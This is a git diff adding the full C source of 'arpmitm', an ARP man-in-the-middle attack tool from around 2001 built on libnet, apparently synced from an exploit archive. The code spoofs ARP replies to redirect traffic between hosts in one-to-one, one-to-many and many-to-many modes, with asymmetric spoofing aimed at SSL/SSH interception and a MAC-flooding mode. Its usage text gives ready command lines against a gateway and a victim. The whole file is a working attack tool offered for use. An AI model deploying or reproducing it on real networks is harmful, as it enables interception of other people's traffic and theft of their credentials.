packetstorm sync

1 files changed, 584 insertions, 0 deletions

diff --git a/other/arpmitm/arpmitm.c b/other/arpmitm/arpmitm.c
new file mode 100644
index 0000000..99362ab
--- /dev/null
+++ b/other/arpmitm/arpmitm.c
@@ -0,0 +1,584 @@
+/*
+ * ARP MITM attack tool. (c) xdr 2000
+ * rewritten & enhanced by skyper 2001
+ * Idea from scut's arptool - Requires Libnet 1.00.
+ *
+ * Changes:
+ *      skyper  : - rewritten
+ *                - macoff
+ *                - ip-list file input/output,
+ *                      <ip1>[:<mac1>]
+ *                      <ip2>[:<mac2>]
+ *                      ...
+ *                - asymmetric arpmim support (usefull for ssl/sshd mim)
+ *                - 1:N and n:N arpmim (experimental)
+ *                - ARP_REQUEST/REPLY (see informationals 001)
+ *                  [UPDATE: same techniq works against obsd2.8
+ *                  solaris 7+8, hpux10.20, hpux11.00, fbsd4.2, linux 2.2]
+ * 
+ * Features:
+ * - classic mim: redirect data from 1 host to 1 host via your host.
+ * - redirect data from n hosts to 1 host via your host with specific ip:mac.
+ * - redirect data from N/all hosts to 1 host via your host with just 
+ *   1 packet every 10 seconds. We use broadcast mac with unicast 
+ *   arp-information in the packet.
+ * - redirect communication from n hosts to n hosts via your host
+ *   with just n packets (and _not_ n*n as most(all?) existing arpmim tools.
+ * 
+ * Hints:
+ * - dont forgett to enable forwarding:
+ *   "echo 1 >/proc/sys/net/ipv4/ip_forward"
+ * - dont use NAT/connection tracking while hijaking.
+ * - configure your firewall (input, output, forward rules)
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdarg.h>
+#include <unistd.h>
+#include <signal.h>
+#include <math.h>
+#include <string.h>
+#include <libnet.h>
+
+#define LINK_DEV        "eth0"
+#define MAXBUFSIZE      1024
+#define RECACHE_TIME    10
+#define int_ntoa(x)     inet_ntoa(*((struct in_addr *)&(x)))
+#define OPT_ASYM        0x01
+#define OPT_FILE        0x02
+#define OPT_REVASYM     0x04
+#define OPT_MACOFF      0x08
+
+static char rcs_id[] = "$Id: arpmitm.c,v 1.4 2001/03/29 17:13:16 skyper Exp $";
+
+struct arp_mitm {
+        unsigned char ether_src[6];
+        unsigned char ether_dst[6];
+        unsigned long s_addr;
+        unsigned long d_addr;
+};
+
+struct _ipmac {
+        unsigned char mac[6];
+        unsigned long ip;
+};
+
+struct _opt {
+        unsigned long int pwait;
+        u_short arpop;
+        struct _ipmac trgt;
+        int verb;
+        unsigned char mymac[6];
+        unsigned char flags;
+        char *ldev;
+        struct libnet_link_int *link;
+        unsigned long int (*initipmac) (void *);
+        unsigned long int (*getnextipmac) (void *);
+        unsigned long int (*resetipmac) (void *);
+} opt;
+
+struct _avlopt {
+        int pos;
+        int len;
+        char **argvlist;
+} avl;
+
+struct _fl {
+        FILE *fd;
+} fl;
+
+/*
+ * spread mode ip structure. all ip infos in HBO
+ */
+struct _srdnfo {
+        unsigned long ip_offset;
+        unsigned long ip_blklen;
+        unsigned long ip_pos;
+        unsigned long start_ip;
+        unsigned long end_ip;
+};
+
+void parse_mac(char *, unsigned char *);
+u_long gennext_spreadip(struct _srdnfo *);
+int init_spreadset(struct _srdnfo *, u_long, u_long);
+int str2ipmac(char *, struct _ipmac *);
+void die(int, char *, ...);
+
+
+
+static unsigned char *pkt;
+
+int
+dummy()
+{
+        return (0);
+}
+
+unsigned long int
+init_argvlist(char *argv[])
+{
+        avl.argvlist = argv;
+        avl.len = 0;
+        avl.pos = 0;
+
+        if (avl.argvlist == NULL)
+                return (-1);
+
+        while (avl.argvlist[avl.len] != NULL)
+                avl.len++;
+
+        return (0);
+}
+
+unsigned long int
+getnext_argvlist(struct _ipmac *ipmac)
+{
+        if (avl.pos >= avl.len)
+                return(-1);
+
+        str2ipmac(avl.argvlist[avl.pos++], ipmac);
+        return (0);
+}
+
+unsigned long int
+reset_argvlist()
+{
+        if (opt.verb > 1)
+                printf("restarting from the beginning.\n");
+
+        avl.pos = 0;
+        return (0);
+}
+
+unsigned long int
+getnext_filelist(struct _ipmac *ipmac)
+{
+        char buf[128];
+
+        if (fgets(buf, sizeof(buf)-1, fl.fd) == NULL)
+                return (-1);
+
+        str2ipmac(buf, ipmac);
+        return (0);
+}
+
+unsigned long int
+reset_filelist()
+{
+        if (opt.verb > 1)
+                printf("reached eof. restarting filelist\n");
+
+        return (fseek(fl.fd, 0L, SEEK_SET));
+}
+
+unsigned long int
+getnext_random(struct _ipmac *ipmac)
+{
+        static char i = 0;
+
+        if (i == 0)
+        {
+                srand((int)time(NULL));
+                i = 1;
+        }
+
+        opt.trgt.ip = rand();
+        ipmac->ip = rand();     /* we honestly dont care about the      */
+                                /* first 2 bytes of the mac....         */
+        memcpy(ipmac->mac+2, (char *)&(ipmac->ip), 4);
+        memcpy(opt.trgt.mac+2, (char *)&(opt.trgt.ip), 4);
+        memcpy(opt.mymac, ipmac->mac, 6);
+
+        return (0);
+}
+
+void
+init_vars()
+{
+        opt.pwait = 4000;
+        opt.arpop = ARPOP_REPLY;
+        opt.flags = 0;
+        opt.verb = 0;
+        opt.ldev = LINK_DEV;
+        opt.initipmac = (void *) init_argvlist;
+        opt.getnextipmac = (void *) getnext_argvlist;
+        opt.resetipmac = (void *) reset_argvlist;
+}
+
+
+/*
+ * this is for sure not reentrant.
+ * returns mac-string from mac
+ * NULL on error
+ */
+static char *
+mac2str(unsigned char m[6])
+{
+        static char buf[32];
+
+        sprintf(buf, "%2.2x:%2.2x:%2.2x:%2.2x:%2.2x:%2.2x", m[0], m[1], m[2],
+                                                        m[3], m[4], m[5]);
+        return (buf);
+}
+
+/*
+ * convert "<ip>:<mac> touple to ipmac struct
+ * Set "ff:ff:ff:ff:ff:ff" if no mac is given.
+ * return -1 on failure, 0 on success
+ */
+int
+str2ipmac(char *str, struct _ipmac *ipmac)
+{
+        char *ptr;
+        char str2[128];
+
+        if (ipmac == NULL)
+                return (-1);
+        if (str == NULL)
+                return (-1);
+
+        strncpy(str2, str, sizeof(str2)-1);
+        str2[sizeof(str2)-1] = '\0';
+        if ((ptr = strchr(str2, ':')) != NULL)
+        {
+                *ptr++ = '\0';
+                parse_mac(ptr, ipmac->mac);
+        } else {
+                memcpy(ipmac->mac, "\xff\xff\xff\xff\xff\xff", 6);
+        }
+
+        ipmac->ip = inet_addr(str2);
+        
+        return (0);
+}
+
+void 
+usage(int code, char *string)
+{
+        fprintf(stderr, "ERROR: %s\n", string);
+        fprintf(stderr,
+"\n"
+"Usage:\n"
+"arpmim [OPTION] <your mac> <targetip[:targetmac] <ip1[:mac1]> ...\n"
+"[Tell ip1, ip2, ... ipN that targetip has <your mac> and\n"
+" tell targetip that ip1, ip2, ... ipN has <your mac>]\n\n"
+"Options:\n"
+" -i <device>   : ethernet device [default=eth0]\n"
+" -l <iprange>  : generate ip-list [73.50.0.0-73.50.31.255]\n"
+" -f <file>     : read ip's[/:mac's] from file\n"
+" -w <n ms>     : wait n ms between each packet [default=4sec]\n"
+" -m            : macoff (macflood, elite switch -> lame hub)\n"
+" -r            : use ARPOP_REQUEST [default=ARPOP_REPLY]\n"
+" -a            : asymmetric\n"
+" -A            : reverse asymmetric\n"
+" -v            : verbose output [-vv..vv for more]\n"
+"\nExamples:\n"
+"Classic (1:1, gate=10.0.255.254, luser=10.0.119.119):\n"
+"arpmim -v 00:02:13:37:73:50 10.0.255.254:11:11:22:22:33:33 \\\n"
+"                            10.0.119.119:44:44:55:55:66:66\n"
+"\n"
+"Advanced (1:N, gate=10.0.255.254, asymmetric _only_):\n"
+"arpmim -A -v 00:02:13:37:73:50 255.255.255.255 10.0.255.254\n"
+"[tell everyone that 10.0.255.254 has 00:02:13:37:73:50]\n"
+"\n"
+"Elite (n:N):\n"
+"arpmim -A -v 00:02:13:37:73:50 255.255.255.255 10.0.0.1 10.0.0.2 10.0.0.3 \\\n"
+"                                               10.0.0.4 10.0.0.5 10.0.0.6\n"
+"[tell 10.0.0.1,..10.0.0.6 that 10.0.0.1,..10.0.0.6 has 00:02:13:37:73:50]\n");
+
+        exit(code);
+}
+
+/*
+ * write ip's to fd, one per line.
+ * return 0 on success, -1 on error
+ */
+int
+write_iprange(FILE *fd, char *str)
+{
+        u_long ip;
+        char *ptr;
+        struct _srdnfo srdnfo;
+        char str2[128];
+
+        strncpy(str2, str, sizeof(str2)-1);
+        str2[sizeof(str2)-1] = '\0';
+
+        if ((ptr = strchr(str2, '-')) == NULL)
+                return (-1);
+
+        *ptr++ = '\0';
+
+        srdnfo.start_ip = ntohl(inet_addr(str2));
+        srdnfo.end_ip = ntohl(inet_addr(ptr));
+        if (init_spreadset(&srdnfo, srdnfo.start_ip, srdnfo.end_ip) != 0)
+                return (-1);
+
+        while ((ip = gennext_spreadip(&srdnfo)) != -1)
+                printf("%s\n", int_ntoa(ip));
+
+        return (0);
+}
+
+
+void
+do_opt(int argc, char *argv[])
+{
+        extern char *optarg;
+        extern int optind;
+        int c;
+
+        while ((c = getopt (argc, argv, "w:i:l:f:mrAav")) != -1)
+        {
+                switch (c)
+                {
+                case 'r':
+                        opt.arpop = ARPOP_REQUEST;
+                        break;
+                case 'w':
+                        opt.pwait = strtoul (optarg, NULL, 10);
+                        break;
+                case 'i':
+                        opt.ldev = optarg;
+                        break;
+                case 'l':
+                        if (write_iprange(stdout, optarg) != 0)
+                                die (EXIT_FAILURE, "iprage? %s", optarg);
+                        break;
+                case 'A':
+                        opt.flags |= OPT_REVASYM;
+                        break;
+                case 'a':
+                        opt.flags |= OPT_ASYM;
+                        break;
+                case 'v':
+                        opt.verb++;
+                        break;
+                case 'f':
+                        if ((fl.fd = fopen(optarg, "r")) == NULL)
+                                die (EXIT_FAILURE, "fopen %s", optarg);
+
+                        opt.initipmac = (void *) dummy;
+                        opt.getnextipmac = (void *) getnext_filelist;
+                        opt.resetipmac = (void *) reset_filelist;
+                        break;
+                case 'm':
+                        opt.flags |= OPT_MACOFF;
+                        opt.initipmac = (void *) dummy;
+                        opt.getnextipmac = (void *) getnext_random;
+                        opt.resetipmac = (void *) dummy;
+                        break;
+                case ':':
+                        usage(EXIT_FAILURE, "parameter missing");
+                        break;  /* this should never happen */
+                default:
+                        usage(EXIT_FAILURE, "unknown option");
+                        break;
+                }
+        }
+
+        if (opt.flags & OPT_MACOFF)
+                return;
+
+        if (argv[optind] != NULL)
+                parse_mac(argv[optind++], opt.mymac);
+        else
+                die (EXIT_FAILURE, "you must specifiy your own mac.");
+
+        if (argv[optind] != NULL)
+                str2ipmac(argv[optind++], &opt.trgt);
+        else
+                die (EXIT_FAILURE, "no target given.");
+
+        opt.initipmac(&argv[optind]);
+
+}
+
+void cleanup(int ret)
+{
+        fprintf(stderr, "exiting...\n");
+        libnet_destroy_packet(&pkt);
+        exit(ret);
+}
+
+void
+die(int code, char *fmt, ...)
+{
+        va_list ap;
+        char buf[512];
+        
+        va_start (ap, fmt);
+        vsnprintf (buf, sizeof (buf) -1, fmt, ap);
+        va_end (ap);
+        fprintf(stderr, "ERROR: %s\n", buf);
+
+        cleanup(code);
+}
+        
+void banner( void )
+{
+        printf("\n/*\n"
+               " * ARP MITM attack tool. (c) xdr 2000\n"
+               " * rewritten & enhanced by skyper 2001\n"
+               " * %s\n"
+               " */\n", rcs_id);
+        if (opt.verb > 5)
+                printf("harharhar. PRETTY VERBOSE now you evil hacker!\n");
+}
+
+/*
+ * get next ip in spread-mode
+ * return NBO ip or -1 on error or when done
+ */
+u_long
+gennext_spreadip(struct _srdnfo *srdnfo)
+{
+        u_long pos = srdnfo->ip_pos;
+
+        if ((srdnfo->ip_offset + 1 >= srdnfo->ip_blklen)
+                && (srdnfo->ip_pos > srdnfo->end_ip))
+                return (-1);
+
+        if ((srdnfo->ip_pos + srdnfo->ip_blklen > srdnfo->end_ip)
+                && (srdnfo->ip_offset + 1 < srdnfo->ip_blklen))
+                srdnfo->ip_pos = srdnfo->start_ip + (++srdnfo->ip_offset);
+        else
+                srdnfo->ip_pos += srdnfo->ip_blklen;
+
+        return (htonl (pos));
+}
+
+/*
+ * init spreadset, ip's in HBO
+ * return 0 on success, -1 on error
+ */
+int
+init_spreadset(struct _srdnfo *srdnfo, u_long start_ip, u_long end_ip)
+{
+        if (srdnfo == NULL)
+                return (-1);
+
+        if (start_ip >= end_ip)
+                return (-1);
+
+        srdnfo->start_ip = start_ip;
+        srdnfo->ip_pos = srdnfo->start_ip;
+        srdnfo->end_ip = end_ip;
+        srdnfo->ip_blklen = (u_long) sqrt ((double)(end_ip - start_ip));
+        if (srdnfo->ip_blklen > 100)    /* range is 100^2 in size */
+                srdnfo->ip_blklen = 257 + srdnfo->ip_blklen * 0.2;
+
+        srdnfo->ip_offset = 0;
+
+        return (0);
+}
+
+void parse_mac(char *mac_string, unsigned char *mac)
+{
+  unsigned int tmp[6];
+  int i;
+
+        sscanf(mac_string, "%2x:%2x:%2x:%2x:%2x:%2x",
+               &tmp[0], &tmp[1], &tmp[2], &tmp[3], &tmp[4], &tmp[5]);
+
+        for(i = 0;i < 6;i++) mac[i] = tmp[i];
+}
+
+
+/*
+ * tell 'dst' that I'M src
+ * return 0 on success
+ */
+int
+do_arpmim(char *mymac, struct _ipmac *src, struct _ipmac *dst)
+{
+        libnet_build_ethernet(dst->mac,
+                              mymac,
+                              ETHERTYPE_ARP, NULL, 0, pkt);
+
+        libnet_build_arp(ARPHRD_ETHER, ETHERTYPE_IP,
+                         6, 4, opt.arpop,
+                         mymac,
+                         (unsigned char *)&src->ip,
+                         dst->mac,
+                         (unsigned char *)&dst->ip, 
+                         NULL, 0, pkt + LIBNET_ETH_H);
+
+        libnet_write_link_layer(opt.link, opt.ldev, pkt,
+                                LIBNET_ETH_H + LIBNET_ARP_H);
+        return (0);
+
+}
+void
+print_amitm(struct _ipmac *ipmac0, struct _ipmac *ipmac)
+{
+        if (opt.verb)
+        {
+                printf("Hi %s:%s, ", int_ntoa(ipmac->ip),
+                                        mac2str(ipmac->mac));
+                printf("%s is at %s\n", int_ntoa(ipmac0->ip),
+                                         mac2str(opt.mymac));
+        }
+}
+
+int 
+main(int argc, char *argv[])
+{
+  char error_buf[MAXBUFSIZE + 1];
+  int i;
+  unsigned short c = 0;
+  struct _ipmac ipmac;
+
+        init_vars();
+        do_opt(argc, argv);
+        if (opt.initipmac == NULL)
+                usage(0, "not enough parameters");
+
+        banner(); 
+
+        if(libnet_init_packet(LIBNET_ETH_H + LIBNET_ARP_H, &pkt) == -1)
+                die(EXIT_FAILURE, "libnet_init_packet failed.");
+
+        if((opt.link = libnet_open_link_interface(opt.ldev, error_buf)) == NULL)
+                die(EXIT_FAILURE, "libnet_open_link_interface failed: %s.",
+                        error_buf);
+
+        signal(SIGINT, cleanup);
+        signal(SIGKILL, cleanup);
+
+        c = 0;
+        i = 0;
+        while (1)
+        {
+
+                if (opt.getnextipmac(&ipmac) == -1)
+                {
+                        if (opt.resetipmac(NULL) != 0)
+                                die(EXIT_FAILURE, "unable to reset ipmac list");
+
+                        opt.getnextipmac(&ipmac);
+                }
+
+                if (!(opt.flags & OPT_REVASYM))
+                {
+                        if (opt.verb)
+                                print_amitm(&opt.trgt, &ipmac);
+                        do_arpmim(opt.mymac, &opt.trgt, &ipmac);
+                }
+
+                if (!(opt.flags & OPT_ASYM))
+                {
+                        usleep(3000); /* 0.03 seconds */
+                        if (opt.verb)
+                                print_amitm(&ipmac, &opt.trgt);
+                        do_arpmim(opt.mymac, &ipmac, &opt.trgt);
+                }
+
+                usleep(opt.pwait * 1000);
+        }
+
+        exit (EXIT_SUCCESS);
+        return (EXIT_SUCCESS);
+}
+